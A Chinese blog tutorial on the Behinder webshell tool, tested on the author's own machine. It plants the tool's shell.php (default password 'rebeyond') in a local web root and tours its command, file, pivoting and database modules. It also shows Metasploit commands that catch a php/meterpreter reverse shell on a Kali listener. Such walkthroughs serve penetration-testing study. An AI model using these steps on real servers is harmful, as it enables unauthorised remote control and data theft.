冰蝎使用

一.启动

Windows环境下:
1.配置环境:冰蝎只支持jre6-jre8
可以在电脑上查看java版本
命令:java -version
在这里插入图片描述
2.启动
在冰蝎目录下命令行输入
命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化)
在这里插入图片描述
即可开启
Linux环境下:
注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令

二.使用(在本机进行实测)

环境:phpStudy+冰蝎

通过启动phpStudy,访问本机地址
在这里插入图片描述
成功访问说明环境已经搭建成功
在这里插入图片描述
在网站根目录下创建一个shell2.php的php文件,文件内容需要我们下载的冰蝎server中带有的shell.php文件中的内容复制过去
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到默认连接密码为rebeyond
这时通过冰蝎去连接该文件
在这里插入图片描述
输入URL和密码即可
在这里插入图片描述
点击此URL
在这里插入图片描述
可以看到成功连接,此时已经把基本信息显示出来了

三.模块介绍

1.基本信息

直接显示出phpinfo,通过此表可以用来信息收集

2.命令执行

在这里插入图片描述

3.虚拟终端

在这里插入图片描述
也可以进行cmd.exe,powershell.exe等功能

4.文件管理

在这里插入图片描述
可以操作管理文件

5.内网渗透

在这里插入图片描述

6.反弹shell

这里演示利用kali虚拟机作监听
Kali(10.0.78.17)
本机(10.0.78.14)
(1)首先打开msf,设置监听
命令:use exploit/multi/handler
set payload php/meterpreter/reverse_tcp(主要此时的paload)
在这里插入图片描述
接下来设置参数
命令:show options
在这里插入图片描述
可以看到只需要设置LHOST即可
命令:set LHOST 10.0.78.17
在这里插入图片描述
然后exploit执行
跳转到冰蝎界面,输入对应ip地址及端口,点击给我连
在这里插入图片描述
查看结果
在这里插入图片描述
成功返回meterpreter

7.管理数据库

在这里插入图片描述
冰蝎原理参考:https://xz.aliyun.com/t/2774

  • 11
    点赞
  • 56
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值